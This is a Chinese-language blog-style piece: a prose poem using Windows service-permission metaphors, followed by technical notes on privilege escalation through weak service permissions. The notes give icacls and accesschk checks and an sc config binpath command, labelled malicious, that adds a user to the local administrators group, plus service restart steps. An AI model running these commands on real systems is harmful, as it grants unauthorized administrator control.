今天的我，狀態就像一個服務的權限設定出了問題。

系統還在跑，卻缺了幾道關鍵的限制—

身體的不適，讓我沒有心力啟動防護機制。

辦公室的空氣冷得像機房，我縮在椅子裡，像一個等待命令的服務 Process，孤零零掛在記憶體裡，沒人呼叫。

偏偏這時候，就會想到他。

他是那種，擁有最高訪問權限的人—

只要輕輕一行 sc config 我 binpath="微笑與問候"，

就能把我的日常覆寫成他想要的模樣。

我試著鎖上自己的檔案系統，卻像那次忘了設定 NTFS 權限的服務程式，

他一靠近，我就允許他覆蓋我的情緒。

或許，弱權限並不是漏洞，

而是我自己保留的後門。

只是今天，服務還在等待啟動的信號，

而管理員…… 沒有登入。

技術筆記：查看權限的相關指令

1. 檢查檔案或目錄 ACL 權限

icacls

用來查看檔案或目錄的存取控制清單（ACL）

例如：

icacls "C:\Program Files\ExampleService\service.exe"

如果看到 Everyone:(F) 或 BUILTIN\Users:(F)，代表所有人都能完全控制該檔案。

2. 列舉服務權限

accesschk（Sysinternals 工具）

檢查誰對服務有寫入或修改權限。

例如：

accesschk.exe /accepteula -quvcw ServiceName

如果 Authenticated Users 有 SERVICE_ALL_ACCESS，代表任何登入用戶都能修改該服務設定。

3. 修改服務可執行檔路徑

sc config

可更改服務啟動時執行的檔案路徑。

例如（惡意範例）：

sc config ServiceName binpath="cmd /c net localgroup administrators myuser /add"

讓服務啟動時執行新增使用者到管理員群組的指令。

4. 啟停服務觸發執行

sc start / sc stop

停止服務後再啟動，會執行我們在 binpath 設定的指令。

例如：

sc stop ServiceName
sc start ServiceName

5. 確認群組成員

net localgroup administrators

查看本機管理員群組成員。

小語

# 今天的我，像極了對你啟用了 Weak Permissions 模式。